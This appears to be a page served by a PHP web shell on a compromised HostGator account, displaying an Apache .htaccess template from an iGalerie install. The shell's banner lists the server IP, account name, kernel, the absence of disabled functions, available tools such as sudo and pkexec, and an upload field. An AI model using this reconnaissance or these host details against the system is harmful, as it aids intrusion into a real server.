| Server IP : 162.144.4.212 / Your IP : 216.73.216.49 Web Server : Apache System : Linux gator2125.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : cozeellc ( 2980) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/softaculous/igalerie/ |
Upload File : |
AddCharset UTF-8 .css .js
Options -Indexes
<IfModule mod_negotiation.c>
Options -MultiViews
</IfModule>
<Files ~ "\.(db|html?|sql|tpl\.php)$">
Deny from all
</Files>
<IfModule mod_headers.c>
Header set Cross-Origin-Resource-Policy "same-origin"
Header set X-Frame-Options "SAMEORIGIN"
</IfModule>
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType application/javascript "access plus 1 month"
ExpiresByType application/x-javascript "access plus 1 month"
ExpiresByType font/woff "access plus 1 month"
ExpiresByType image/avif "access plus 1 month"
ExpiresByType image/gif "access plus 1 month"
ExpiresByType image/jpeg "access plus 1 month"
ExpiresByType image/jpg "access plus 1 month"
ExpiresByType image/png "access plus 1 month"
ExpiresByType image/webp "access plus 1 month"
ExpiresByType text/css "access plus 1 month"
ExpiresByType text/javascript "access plus 1 month"
ExpiresByType video/mp4 "access plus 1 month"
ExpiresByType video/webm "access plus 1 month"
ExpiresDefault "access plus 2 hours"
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase [[relativeurl]]/
RewriteRule ^sitemap\.xml$ sitemap.php [L,NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond $1 !^(favicon\.ico|robots\.txt|sitemap\.php|sitemap\.xml)
RewriteRule (.*) index.php?q=$1 [QSA,L]
</IfModule>
<IfModule mod_security.c>
SecFilterEngine Off
</IfModule>